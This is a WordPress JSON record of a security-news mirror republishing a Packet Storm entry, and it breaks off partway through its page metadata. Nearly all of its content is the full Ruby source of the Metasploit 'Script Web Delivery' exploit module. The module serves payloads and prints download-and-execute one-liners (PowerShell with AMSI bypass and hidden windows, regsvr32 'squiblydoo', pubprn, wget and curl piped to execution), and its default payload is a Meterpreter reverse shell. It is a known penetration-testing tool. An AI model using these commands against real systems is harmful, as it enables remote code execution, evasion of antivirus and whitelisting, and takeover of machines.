{"id":14814,"date":"2025-08-28T11:48:29","date_gmt":"2025-08-28T11:48:29","guid":{"rendered":"http:\/\/localhost\/?p=14814"},"modified":"2025-08-28T11:48:29","modified_gmt":"2025-08-28T11:48:29","slug":"script-web-delivery","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=14814","title":{"rendered":"\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-28T16:37:30&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module quickly fires up a web server that serves a payload. The module will provide a command to&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Script Web Delivery&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:208942&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ManualRanking\\n    \\n      include Msf::Exploit::EXE\\n      include Msf::Exploit::Powershell\\n      include Msf::Exploit::Remote::HttpServer\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;Script Web Delivery&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              This module quickly fires up a web server that serves a payload.\\n    \\n              The module will provide a command to be run on the target machine\\n              based on the selected target. The provided command will download\\n              and execute a payload using either a specified scripting language\\n              interpreter or \\&#8221;squiblydoo\\&#8221; via regsvr32.exe for bypassing\\n              application whitelisting.\\n    \\n              The main purpose of this module is to quickly establish a session on a\\n              target machine when the attacker has to manually type in the command:\\n              e.g. Command Injection, RDP Session, Local Access or maybe Remote\\n              Command Execution.\\n    \\n              This attack vector does not write to disk so it is less likely to\\n              trigger AV solutions and will allow privilege escalations supplied\\n              by Meterpreter.\\n    \\n              When using either of the PSH targets, ensure the payload architecture\\n              matches the target computer or use SYSWOW64 powershell.exe to execute\\n              x86 payloads on x64 machines.\\n    \\n              Regsvr32 uses \\&#8221;squiblydoo\\&#8221; technique to bypass application whitelisting.\\n              The signed Microsoft binary file, Regsvr32, is able to request an .sct\\n              file and then execute the included PowerShell command inside of it.\\n    \\n              Similarly, the pubprn target uses the pubprn.vbs script to request and\\n              execute a .sct file.\\n    \\n              Both web requests (i.e., the .sct file and PowerShell download\/execute)\\n              can occur on the same port.\\n    \\n              The SyncAppvPublishingServer target uses SyncAppvPublishingServer.exe\\n              Microsoft signed binary to request and execute a PowerShell script. This\\n              technique only works on Windows 10 builds \\u003c= 1709.\\n    \\n              \\&#8221;PSH (Binary)\\&#8221; will write a file to the disk, allowing for custom binaries\\n              to be served up to be downloaded and executed.\\n            },\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;Andrew Smith \\&#8221;jakx\\&#8221; \\u003cjakx.ppr@gmail.com\\u003e&#8217;,\\n              &#8216;Ben Campbell&#8217;,\\n              &#8216;Chris Campbell&#8217;, # @obscuresec &#8211; Inspiration n.b. no relation!\\n              &#8216;Casey Smith&#8217;, # AppLocker bypass research and vulnerability discovery (@subTee)\\n              &#8216;Trenton Ivey&#8217;, # AppLocker MSF Module (kn0)\\n              &#8216;g0tmi1k&#8217;, # @g0tmi1k \/\/ https:\/\/blog.g0tmi1k.com\/ &#8211; additional features\\n              &#8216;bcoles&#8217;, # support for targets: pubprn, SyncAppvPublishingServer and Linux wget\\n              &#8216;Matt Nelson&#8217;, # @enigma0x3 \/\/ pubprn discovery\\n              &#8216;phra&#8217;, # @phraaaaaaa \/\/ https:\/\/iwantmore.pizza\/ &#8211; AMSI\/SBL bypass\\n              &#8216;Nick Landers&#8217;, # @monoxgas \/\/ SyncAppvPublishingServer discovery\\n            ],\\n            &#8216;DefaultOptions&#8217; =\\u003e {\\n              &#8216;Payload&#8217; =\\u003e &#8216;python\/meterpreter\/reverse_tcp&#8217;,\\n              &#8216;Powershell::exec_in_place&#8217; =\\u003e true\\n            },\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;URL&#8217;, &#8216;https:\/\/securitypadawan.blogspot.com\/2014\/02\/php-meterpreter-web-delivery.html&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/www.pentestgeek.com\/2013\/07\/19\/invoke-shellcode\/&#8217;],\\n              [&#8216;URL&#8217;, &#8216;http:\/\/www.powershellmagazine.com\/2013\/04\/19\/pstip-powershell-command-line-switches-shortcuts\/&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/www.darkoperator.com\/blog\/2013\/3\/21\/powershell-basics-execution-policy-and-code-signing-part-2.html&#8217;],\\n              [&#8216;URL&#8217;, &#8216;http:\/\/web.archive.org\/web\/20171026182440\/http:\/\/subt0x10.blogspot.com:80\/2017\/04\/bypass-application-whitelisting-script.html&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/enigma0x3.net\/2017\/08\/03\/wsh-injection-a-case-study\/&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/iwantmore.pizza\/posts\/amsi.html&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Regsvr32\/&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Syncappvpublishingserver\/&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/lolbas-project.github.io\/lolbas\/Scripts\/Pubprn\/&#8217;],\\n            ],\\n            &#8216;Platform&#8217; =\\u003e %w[python php win linux osx],\\n            &#8216;Targets&#8217; =\\u003e [\\n              [\\n                &#8216;Python&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;python&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e ARCH_PYTHON\\n                }\\n              ],\\n              [\\n                &#8216;PHP&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;php&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e ARCH_PHP\\n                }\\n              ],\\n              [\\n                &#8216;PSH&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64]\\n                }\\n              ],\\n              [\\n                &#8216;Regsvr32&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64]\\n                }\\n              ],\\n              [\\n                &#8216;pubprn&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64]\\n                }\\n              ],\\n              [\\n                &#8216;SyncAppvPublishingServer&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64]\\n                }\\n              ],\\n              [\\n                &#8216;PSH (Binary)&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64]\\n                }\\n              ],\\n              [\\n                &#8216;Linux&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;linux&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64]\\n                }\\n              ],\\n              [\\n                &#8216;Mac OS X&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;osx&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64]\\n                }\\n              ],\\n            ],\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2013-07-19&#8217;,\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;Reliability&#8217; =\\u003e UNKNOWN_RELIABILITY,\\n              &#8216;Stability&#8217; =\\u003e UNKNOWN_STABILITY,\\n              &#8216;SideEffects&#8217; =\\u003e UNKNOWN_SIDE_EFFECTS\\n            }\\n          )\\n        )\\n    \\n        register_advanced_options(\\n          [\\n            OptBool.new(&#8216;PSH-AmsiBypass&#8217;, [ true, &#8216;PSH &#8211; Request AMSI\/SBL bypass before the stager&#8217;, true ]),\\n            OptString.new(&#8216;PSH-AmsiBypassURI&#8217;, [ false, &#8216;PSH &#8211; The URL to use for the AMSI\/SBL bypass (Will be random if left blank)&#8217;, &#8221; ]),\\n            OptBool.new(&#8216;PSH-EncodedCommand&#8217;, [ true, &#8216;PSH &#8211; Use -EncodedCommand for web_delivery launcher&#8217;, true ]),\\n            OptBool.new(&#8216;PSH-ForceTLS12&#8217;, [ true, &#8216;PSH &#8211; Force use of TLS v1.2&#8217;, true ]),\\n            OptBool.new(&#8216;PSH-Proxy&#8217;, [ true, &#8216;PSH &#8211; Use the system proxy&#8217;, true ]),\\n            OptString.new(&#8216;PSHBinary-PATH&#8217;, [ false, &#8216;PSH (Binary) &#8211; The folder to store the file on the target machine (Will be %TEMP% if left blank)&#8217;, &#8221; ]),\\n            OptString.new(&#8216;PSHBinary-FILENAME&#8217;, [ false, &#8216;PSH (Binary) &#8211; The filename to use (Will be random if left blank)&#8217;, &#8221; ]),\\n          ]\\n        )\\n      end\\n    \\n      def primer\\n        print_status(&#8216;Run the following command on the target machine:&#8217;)\\n    \\n        case target.name\\n        when &#8216;PHP&#8217;\\n          print_line(%(php -d allow_url_fopen=true -r \\&#8221;eval(file_get_contents(&#8216;#{get_uri}&#8217;, false, stream_context_create([&#8216;ssl&#8217;=\\u003e[&#8216;verify_peer&#8217;=\\u003efalse,&#8217;verify_peer_name&#8217;=\\u003efalse]])));\\&#8221;))\\n        when &#8216;Python&#8217;\\n          print_line(%(python -c \\&#8221;import sys;import ssl;u=__import__(&#8216;urllib&#8217;+{2:&#8221;,3:&#8217;.request&#8217;}[sys.version_info[0]],fromlist=(&#8216;urlopen&#8217;,));r=u.urlopen(&#8216;#{get_uri}&#8217;, context=ssl._create_unverified_context());exec(r.read());\\&#8221;))\\n        when &#8216;PSH&#8217;\\n          uri = get_uri\\n          if datastore[&#8216;PSH-AmsiBypass&#8217;]\\n            amsi_uri = uri + amsi_bypass_uri\\n            print_line(gen_psh([amsi_uri, uri], &#8216;string&#8217;).to_s)\\n          else\\n            print_line(gen_psh(uri, &#8216;string&#8217;).to_s)\\n          end\\n        when &#8216;pubprn&#8217;\\n          print_line(%(C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Printing_Admin_Scripts\\\\\\\\en-US\\\\\\\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct))\\n        when &#8216;SyncAppvPublishingServer&#8217;\\n          print_line(%(SyncAppvPublishingServer.exe \\&#8221;n;(New-Object Net.WebClient).DownloadString(&#8216;#{get_uri}&#8217;) | IEX\\&#8221;))\\n        when &#8216;Regsvr32&#8217;\\n          print_line(%(regsvr32 \/s \/n \/u \/i:#{get_uri}.sct scrobj.dll))\\n        when &#8216;PSH (Binary)&#8217;\\n          psh = gen_psh(get_uri.to_s, &#8216;download&#8217;)\\n          print_line(psh.to_s)\\n        when &#8216;Linux&#8217;\\n          fname = Rex::Text.rand_text_alphanumeric(8)\\n          print_line(\\&#8221;wget -qO #{fname} &#8211;no-check-certificate #{get_uri}; chmod +x #{fname}; .\/#{fname}\\u0026 disown\\&#8221;)\\n        when &#8216;Mac OS X&#8217;\\n          fname = Rex::Text.rand_text_alphanumeric(8)\\n          print_line(\\&#8221;curl -sk &#8211;output #{fname} #{get_uri}; chmod +x #{fname}; .\/#{fname}\\u0026 disown\\&#8221;)\\n        end\\n      end\\n    \\n      def amsi_bypass_uri\\n        unless datastore[&#8216;PSH-AmsiBypassURI&#8217;].empty?\\n          @amsi_uri = datastore[&#8216;PSH-AmsiBypassURI&#8217;]\\n        end\\n        @amsi_uri ||= random_uri\\n      end\\n    \\n      def on_request_uri(cli, request)\\n        if request.raw_uri.to_s.ends_with?(&#8216;.sct&#8217;)\\n          print_status(&#8216;Handling .sct Request&#8217;)\\n          psh = gen_psh(get_uri.to_s, &#8216;string&#8217;)\\n    \\n          case target.name\\n          when &#8216;pubprn&#8217;\\n            data = gen_pubprn_sct_file(psh)\\n          when &#8216;Regsvr32&#8217;\\n            data = gen_sct_file(psh)\\n          else\\n            print_error(&#8216;Unexpected request for .sct file&#8217;)\\n          end\\n    \\n          send_response(cli, data, &#8216;Content-Type&#8217; =\\u003e &#8216;text\/plain&#8217;)\\n          return\\n        end\\n    \\n        if request.raw_uri.to_s.ends_with?(amsi_bypass_uri)\\n          data = bypass_powershell_protections\\n          print_status(\\&#8221;Delivering AMSI Bypass (#{data.length} bytes)\\&#8221;)\\n          send_response(cli, data, &#8216;Content-Type&#8217; =\\u003e &#8216;text\/plain&#8217;)\\n          return\\n        end\\n    \\n        case target.name\\n        when &#8216;Linux&#8217;, &#8216;Mac OS X&#8217;, &#8216;PSH (Binary)&#8217;\\n          data = generate_payload_exe\\n        when &#8216;PSH&#8217;, &#8216;Regsvr32&#8217;, &#8216;pubprn&#8217;, &#8216;SyncAppvPublishingServer&#8217;\\n          data = cmd_psh_payload(\\n            payload.encoded,\\n            payload_instance.arch.first\\n          )\\n        else\\n          data = payload.encoded.to_s\\n        end\\n    \\n        print_status(\\&#8221;Delivering Payload (#{data.length} bytes)\\&#8221;)\\n        send_response(cli, data, &#8216;Content-Type&#8217; =\\u003e &#8216;application\/octet-stream&#8217;)\\n      end\\n    \\n      def gen_psh(url, *method)\\n        ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\\n        force_tls12 = Rex::Powershell::PshMethods.force_tls12 if datastore[&#8216;PSH-ForceTLS12&#8217;]\\n    \\n        if method.include? &#8216;string&#8217;\\n          download_string = datastore[&#8216;PSH-Proxy&#8217;] ? Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) : Rex::Powershell::PshMethods.download_and_exec_string(url)\\n        else\\n          # Random filename to use, if there isn&#8217;t anything set\\n          random = \\&#8221;#{rand_text_alphanumeric(8)}.exe\\&#8221;\\n    \\n          # Set filename (Use random filename if empty)\\n          filename = datastore[&#8216;PSHBinary-FILENAME&#8217;].blank? ? random : datastore[&#8216;PSHBinary-FILENAME&#8217;]\\n    \\n          # Set path (Use %TEMP% if empty)\\n          path = datastore[&#8216;PSHBinary-PATH&#8217;].blank? ? &#8216;$env:temp&#8217; : %(&#8216;#{datastore[&#8216;PSHBinary-PATH&#8217;]}&#8217;)\\n    \\n          # Join Path and Filename\\n          file = %(echo (#{path}+&#8217;\\\\\\\\#{filename}&#8217;))\\n    \\n          # Generate download PowerShell command\\n          download_string = Rex::Powershell::PshMethods.download_run(url, file)\\n        end\\n    \\n        download_and_run = \\&#8221;#{force_tls12}#{ignore_cert}#{download_string}\\&#8221;\\n    \\n        # Generate main PowerShell command\\n        if datastore[&#8216;PSH-EncodedCommand&#8217;]\\n          download_and_run = encode_script(download_and_run)\\n          return generate_psh_command_line(noprofile: true, windowstyle: &#8216;hidden&#8217;, encodedcommand: download_and_run)\\n        end\\n    \\n        return generate_psh_command_line(noprofile: true, windowstyle: &#8216;hidden&#8217;, command: download_and_run)\\n      end\\n    \\n      def rand_class_id\\n        \\&#8221;#{Rex::Text.rand_text_hex(8)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(12)}\\&#8221;\\n      end\\n    \\n      def gen_sct_file(command)\\n        %{\\u003c?XML version=\\&#8221;1.0\\&#8221;?\\u003e\\u003cscriptlet\\u003e\\u003cregistration progid=\\&#8221;#{rand_text_alphanumeric(8)}\\&#8221; classid=\\&#8221;{#{rand_class_id}}\\&#8221;\\u003e\\u003cscript\\u003e\\u003c![CDATA[ var r = new ActiveXObject(\\&#8221;WScript.Shell\\&#8221;).Run(\\&#8221;#{command}\\&#8221;,0);]]\\u003e\\u003c\/script\\u003e\\u003c\/registration\\u003e\\u003c\/scriptlet\\u003e}\\n      end\\n    \\n      def gen_pubprn_sct_file(command)\\n        %{\\u003c?XML version=\\&#8221;1.0\\&#8221;?\\u003e\\u003cscriptlet\\u003e\\u003cregistration progid=\\&#8221;#{rand_text_alphanumeric(8)}\\&#8221; classid=\\&#8221;{#{rand_class_id}}\\&#8221; remotable=\\&#8221;true\\&#8221;\\u003e\\u003c\/registration\\u003e\\u003cscript\\u003e\\u003c![CDATA[ var r = new ActiveXObject(\\&#8221;WScript.Shell\\&#8221;).Run(\\&#8221;#{command}\\&#8221;,0);]]\\u003e\\u003c\/script\\u003e\\u003c\/scriptlet\\u003e}\\n      end\\n    end&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/208942&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/208942\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-28T16:37:30&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module quickly fires up a web server that serves a payload. The module will provide a command to&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Script Web Delivery&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:208942&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n # This&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-14814","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=14814\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-08-28T16:37:30&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module quickly fires up a web server that serves a payload. The module will provide a command to&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Script Web Delivery&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:208942&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##n # This...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=14814\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-28T11:48:29+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14814#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14814\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942\",\"datePublished\":\"2025-08-28T11:48:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14814\"},\"wordCount\":1890,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=14814#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14814\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14814\",\"name\":\"\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-28T11:48:29+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14814#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=14814\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=14814#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=14814","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-08-28T16:37:30&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module quickly fires up a web server that serves a payload. The module will provide a command to&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Script Web Delivery&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:208942&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##n # This...","og_url":"https:\/\/zero.redgem.net\/?p=14814","og_site_name":"zero redgem","article_published_time":"2025-08-28T11:48:29+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=14814#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=14814"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Script Web 